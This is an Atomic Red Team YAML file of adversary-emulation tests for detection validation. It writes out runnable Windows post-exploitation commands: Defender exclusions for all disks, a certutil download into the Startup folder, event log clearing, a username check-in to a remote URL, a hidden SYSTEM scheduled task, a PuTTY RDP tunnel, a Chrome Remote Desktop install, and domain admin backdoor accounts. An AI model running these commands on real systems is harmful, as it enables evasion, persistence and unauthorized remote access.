Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls

SlashAndGrab.yaml

attack_technique: Many
display_name: Slash and Grab Post-Ex
atomic_tests:
- name: Add all logical disks to Windows Defender exclusion list
  description: |
    This test adds all logical disks on the system to the Windows Defender exclusion list.
  supported_platforms:
  - windows
  executor:
    command: |
      foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}
    name: powershell
    elevation_required: true
- name: certutil download (urlcache)
  description: |
    Use certutil -urlcache argument to download a file from the web
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
    local_path:
      description: Local path to place file
      type: path
      default: c:\mpyutild.msi
  executor:
    command: |
      cmd /c certutil -urlcache -f #{remote_file} #{local_path}
      move #{local_path} "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    cleanup_command: |
      del #{local_path} >nul 2>&1
      del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\#{local_path}" >nul 2>&1
    name: command_prompt
- name: Clear Logs
  description: |
    Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
  supported_platforms:
  - windows
  input_arguments:
    log_name:
      description: Windows Log Name, ex System
      type: string
      default: System
  executor:
    command: |
      wevtutil cl #{log_name}
    name: command_prompt
    elevation_required: true
- name: UserName Checkin 
  description: |
    This test checks in with a remote server using PowerShell.
  supported_platforms:
  - windows
  input_arguments:
    url:
      description: URL to check in with
      type: url
      default: https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName
  executor:
    command: |
      powershell -c "Invoke-WebRequest -Uri #{url}"
    name: command_prompt
    elevation_required: false
- name: Create Scheduled Task
  description: |
    This test creates a scheduled task using SCHTASKS command.
  supported_platforms:
  - windows
  input_arguments:
    task_name:
      description: Name of the task
      type: string
      default: "\\Microsoft\\Windows\\Wininet\\UserCache_1708535250863"
    task_run:
      description: Task to be run
      type: string
      default: "C:\\Windows\\Help\\Help\\SentinelUI.exe"
  executor:
    command: |
      SCHTASKS /Create /TN "#{task_name}" /TR "#{task_run}" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05
    cleanup_command: |
      SCHTASKS /Delete /TN "#{task_name}" /F
    name: command_prompt
    elevation_required: true
- name: Download PuTTY and setup SSH tunnel
  description: |
    This test downloads PuTTY from a URL and sets up an SSH tunnel.
  supported_platforms:
  - windows
  input_arguments:
    host:
      description: SSH host
      type: string
      default: example.com
  executor:
    command: |
      powershell -c "Invoke-WebRequest -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile C:\putty\putty.exe"
      powershell -c "$r = 'C:\putty\'; $e = $r + 'putty.exe'; $g = '#{host}'; $args = @('tunnel@' + $g, '-P 443', '-N', '-ssh', '-L 9595:localhost:3389'); (Start-Process -FilePath $e -ArgumentList $args -PassThru -WindowStyle Hidden).Id"
    cleanup_command: |
      powershell -c "Stop-Process -Name putty -Force"
      powershell -c "Remove-Item -Path C:\putty\putty.exe -Force"
    name: powershell
    elevation_required: false
- name: Download and Install Chrome Remote Desktop Host
  description: |
    This test downloads Chrome Remote Desktop Host from a URL and installs it.
  supported_platforms:
  - windows
  executor:
    command: |
      $path = Join-Path -Path $env:ProgramData -ChildPath '1.msi'
      (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $path)
      Start-Process 'msiexec.exe' -ArgumentList "/i `"$path`"" -Wait
    cleanup_command: |
      Remove-Item -Path $env:ProgramData\1.msi -Force
    name: powershell
    elevation_required: true
- name: Add Users and Assign Groups
  description: |
    This test adds users to the domain and assigns them to various groups.
  supported_platforms:
  - windows
  executor:
    command: |
      net user /add default test@2021! /domain
      net group "Domain Admins" default /add /domain
      net group "Enterprise Admins" default /add /domain
      net group "Remote Desktop Users" default /add /domain
      net group "Group Policy Creator Owners" default /add /domain
      net group "Schema Admins" default /add /domain
      net user default /active:yes /domain
      net user /add default1 test@2021! /domain
      net user /add default1 test@2021! /domain
      net user /add oldadmin Pass8080!!
      net localgroup administrators oldadmin /add
      net user temp 123123qwE /add /domain
      net group "Domain Admins" temp /add /domain
    name: command_prompt
    elevation_required: true
    cleanup_command: |
      net user default /delete /domain
      net group "Domain Admins" default /delete /domain
      net group "Enterprise Admins" default /delete /domain
      net group "Remote Desktop Users" default /delete /domain
      net group "Group Policy Creator Owners" default /delete /domain
      net group "Schema Admins" default /delete /domain
      net user default1 /delete /domain
      net user oldadmin /delete
      net localgroup administrators oldadmin /delete
      net user temp /delete /domain
      net group "Domain Admins" temp /delete /domain